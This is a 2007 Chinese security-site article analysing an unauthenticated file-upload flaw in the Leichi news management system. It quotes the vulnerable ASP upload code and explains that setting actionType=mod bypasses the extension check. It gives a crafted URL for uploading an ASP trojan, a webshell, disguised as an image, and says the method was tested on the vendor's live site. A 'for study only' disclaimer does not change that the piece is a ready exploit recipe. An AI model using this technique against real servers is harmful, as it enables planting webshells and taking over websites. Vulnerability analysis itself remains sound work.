| 网站首页 | 新闻中心 | 系统安全 | 网络安全 | 安全技术 | 下载中心 | 
课件制作网.
收藏本站
设为首页
安全365
雷驰新闻发布管理系统漏洞分析
雷驰新闻发布管理系统漏洞分析
作者:佚名 文章来源:不详 点击数: 更新时间:2007-1-25 12:07:37
声明:漏洞为focn[BCT]首先发现,而且还没有公布!最近在学ASP所以拿来分析了下写出来了!
版权归漏洞发现者focn所有,转载请保持文章完整,并注明出处!
本文章只做学习研究用,任何人用于其他非法用途本人不承担任何责任!


作者:黑萝卜
系统: 雷驰新闻发布管理系统
版本: 当前任何版本
漏洞描述:1 在admin文件夹下的uploadPic.inc.asp中,没有对访问权限进行限制,任意用户都可
以 访问到此文件。任意用户都可以使用此文件上传文件到服务器
2 uploadPic.inc.asp中虽然对上传文件的后缀名进行了限制但是可以绕过。请看代码!

if file.FileSize>0 then ''如果 FileSize > 0 说明有文件数据
'生成图片名字
if actionType= "mod" then
remFileName = Right(picName,len(picName)-InstrRev(picName,"/"))
else
if editRemNum<>"" then
remNum = editRemNum
else
Randomize
remNum = Int((999 - 1 + 1) * Rnd + 1)&day(date)&month(date)&year(date)&hour(time)&minute(time)&second(time)
end if
remFileName = remNum&"_"&(editImageNum+1)&".gif"
end if

file.SaveAs Server.mappath(formPath&remFileName) ''保存文件

%>


关键的是 if actionType= "mod" then
remFileName = Right(picName,len(picName)-InstrRev(picName,"/"))
只要自己构造actionType= "mod" 就可以饶过下面的文件名检测上传ASP文件
构造如下UPL
http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp
然后在上传文件里面填要传的图片格式的ASP木马
就可以在uppic目录下上传文件名为test.asp的文件

本方法在雷驰官方网站上测试通过!·
再次希望大家不要用于非法用途!!【转自世纪安全网 http://www.21safe.com】
文章录入:admin    责任编辑:admin 
  • 上一篇文章:

  • 下一篇文章:
  • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
      网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
     
     
     
    重大新闻 QQ即将可以加1
    Ce-Admin新闻发布系统漏
    业一新闻系统跨站脚本攻
    重要新闻:AMD向中国转让
    伪装邮件世界杯新闻 点击
    新闻分析:恶意邮件泛滥 
    新闻分析:反垃圾邮件市
    新闻分析:反垃圾邮件市
    新闻分析:恶意邮件泛滥 

    Copyright © 2006-2008 www.anquan365.com 安全365
    建议使用1024*768分辨率及第三方浏览器对本站进行浏览